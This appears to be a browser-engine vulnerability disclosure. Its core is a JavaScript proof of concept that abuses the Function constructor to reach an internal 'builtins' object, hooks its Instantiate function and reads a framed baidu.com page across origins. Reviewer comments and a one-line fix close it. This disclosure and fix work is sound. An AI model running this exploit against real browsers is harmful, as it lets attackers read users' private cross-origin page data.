20150224_172726.png


 

20150224_165343.png


 

<!--
  Proof-of-concept from this page: script in the embedding document ends up
  reading the DOM of a cross-origin iframe (https://www.baidu.com/), which the
  same-origin policy is supposed to forbid.
  It works by reaching an object the script calls "builtins" and replacing one
  of its functions. The fix stated after the listing is to restrict script
  execution against that builtins object.
  NOTE(review): this is an engine-side defect, so the remedy is a patched
  browser or WebView engine. Framing restrictions on the target site
  (X-Frame-Options, CSP frame-ancestors) would keep this iframe variant from
  loading the target, but they do not fix the underlying bug.
-->
<body>
<script>
  // Every name below is an implicit global (no var/let/const).

  // Load a cross-origin document in a child frame. Everything else runs from
  // its onload handler.
  frame = document.body.appendChild(document.createElement("iframe"));
  frame.src = "https://www.baidu.com/";
  frame.onload = function() {
    // The "function body" string starts with an unbalanced `}` and then an
    // expression that stores `this` in the global `builtins`.
    // NOTE(review): presumably this only has an effect where the engine splices
    // the body into wrapper source text without validating it, so the injected
    // expression is evaluated with an engine-internal receiver. Confirm against
    // the affected engine version.
    Function("}, (builtins = this), function() {");

    // Keep the original function so the hook below can forward to it.
    originalInstantiate = builtins.Instantiate;
    // Called with the builtins object, the property name and an empty function.
    // NOTE(review): presumably needed so the assignment to builtins.Instantiate
    // below takes effect. The page does not explain this step.
    builtins.DefineOneShotAccessor(builtins, "Instantiate", function() {});

    flag = 0;
    template = null;
    // Replacement for builtins.Instantiate with two modes:
    //   flag set     : read the framed document and display its body markup.
    //                  This cross-origin read is the impact being shown.
    //   flag not set : remember the first `x` it is called with as `template`.
    // Both modes forward to the original and return its result.
    builtins.Instantiate = function(x, y) {
      if (flag) {
        doc = frame.contentWindow.document;
        alert(doc.body.innerHTML);
        flag = 0;
      } else if (!template) template = x;
      return originalInstantiate(x, y);
    };

    // Bare property read with flag still 0.
    // NOTE(review): presumably this makes the engine call Instantiate once, so
    // the hook captures `template`. Confirm.
    document.implementation;

    // Arm the hook, then pass the cross-origin window and the captured template
    // to another function on builtins.
    // NOTE(review): presumably this call reaches the hooked Instantiate, which
    // is when the cross-origin document gets read. Confirm.
    flag = 1;
    builtins.ConfigureTemplateInstance(frame.contentWindow, template);
  }
</script>
</body>
解决方案:

对builtins对象执行脚本进行限制